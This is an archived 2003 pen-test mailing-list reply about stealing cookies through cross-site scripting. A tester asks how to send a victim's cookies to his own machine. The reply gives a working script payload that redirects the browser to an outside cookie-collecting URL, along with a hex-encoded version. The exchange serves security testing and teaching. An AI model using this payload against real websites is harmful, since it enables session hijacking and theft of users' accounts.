RE: Proof of Concept Tool on Web Application Security

From: Robert Auger (rauger@spidynamics.com)
Date: 04/14/03

  • Next message: per@same.net: "Defeating nmap fingerprinting on OpenBSD"
    From: "Robert Auger" <rauger@spidynamics.com>
    To: "'Indian Tiger'" <indiantiger@mailandnews.com>, <pen-test@securityfocus.com>, <rdawes@deloitte.co.za>
    Date: Mon, 14 Apr 2003 11:12:52 -0400
    
    

    >Now I am testing Cross-Site Scripting to steal the client cookies, or any
    >other sensitive information. I am working on my own pen-test-testing site,
    >which is vulnerable to XSS. I was able to display the cookies of the client
    at
    >the victim’s machine, but that was not my goal, my goal is to get that
    cookies
    >on my machine or any desired location. So is there any way by which I can
    >transfer the victim’s cookie or any other information at my machine without
    >interaction of the victim.

    This is covered in the cross site scripting FAQ located at
    http://www.cgisecurity.com/articles/xss-faq.shtml.
    The relevant JavaScript code you are looking for is as follows (A example
    from the paper).

    <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'
    +document.cookie</script>

    (IN HEX)
    %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%
    3d%27%68%74%74
    %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%
    67%69%2d%62%69%6e
    %2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%
    6f%6f%6b%69%65%3c
    %2f%73%63%72%69%70%74%3e

    (Note: This website has a public script that can be used for testing cookie
    theft.)

    Regards,

    Robert Auger
    SPI Labs

    --------------------------------------------------------------
    Costs are climbing and complaints are rising
    as SPAM overloads your e-mail servers and Inboxes
    SurfControl E-mail Filter puts the brakes on spam & viruses
    and gives you the reports to prove it.
    http://www.securityfocus.com/SurfControl-pen-test2
    Download a free trial and see just
    what's going in and out of your organization.
    --------------------------------------------------------------


  • Next message: per@same.net: "Defeating nmap fingerprinting on OpenBSD"

    Relevant Pages

    • [NT] Cookie Data in IE Can Be Exposed or Altered Through Script Injection
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Many web sites use cookies as a way to store information on a user's local ... customers can protect their systems by disabling active scripting. ... are not affected by the HTML mail exploit of this vulnerability because ...
      (Securiteam)
    • Re: Javascript - how do I active it?
      ... Active scripting, script pasting and Java applets are ON ... That is indeed the error message I am getting. ... I did not delete cookies first. ...
      (microsoft.public.windowsxp.help_and_support)
    • [Full-Disclosure] Application validation on defensivethinking.com
      ... I've noticed some issues with respect to the way some of defensivethinking's web pages handle and validate scripts. ... Customer session and cookies are compromised. ... The attacker may be able to pose as a legitimate user to view and alter user records, and perform transactions as that user. ... Microsoft Technet "Cross-site Scripting Overview" ...
      (Full-Disclosure)
    • Re: ASP session variable not passing over
      ... How is are your scripting and cookies configuration? ... Try to make sure you are accepting all cookies and no ... I think there are got to be mis-configured on the IIS ... > enable session state with 20 minute Session timeout). ...
      (microsoft.public.inetserver.iis)
    • Locking down MOST Internet activity...
      ... the Internet (Active X, cookies, scripting) on my TS, yet ... Security Zones I left the Internet zone to the highest ... Also, under Privacy, I set it to block all cookies ...
      (microsoft.public.windows.group_policy)

  • Quantcast